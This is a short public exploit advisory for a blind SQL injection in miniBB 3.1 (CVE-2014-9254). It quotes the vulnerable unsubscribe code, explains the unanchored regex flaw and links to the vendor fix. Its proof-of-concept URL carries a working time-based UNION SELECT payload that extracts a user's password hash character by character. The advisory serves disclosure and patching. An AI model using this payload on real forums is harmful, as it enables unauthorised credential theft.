miniBB 3.1 Blind SQL Injection

`# Exploit Title: miniBB 3.1 Blind SQL Injection  
# Date: 23-11-2014  
# Software Link: http://www.minibb.com/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# CVE: CVE-2014-9254  
# Category: webapps  
  
1. Description  
  
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).  
  
File: bb_func_unsub.php  
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);  
  
$allowUnsub=FALSE;  
$chkCode=FALSE;  
  
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){  
//trying to unsubscribe directly from email  
$chkField='email_code';  
$chkVal=$_GET['code'];  
$userCondition=TRUE;  
$chkCode=TRUE;  
}  
else{  
//manual unsubsribe  
$chkField='user_id';  
$chkVal=$user_id;  
$userCondition=($usrid==$user_id);  
}  
  
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))  
  
http://security.szurek.pl/minibb-31-blind-sql-injection.html  
  
2. Proof of Concept  
  
http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '  
  
This SQL will check if first password character user ID=1 is “c”.  
  
If yes, it will sleep 5 seconds.  
  
3. Solution:  
  
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html  
  
`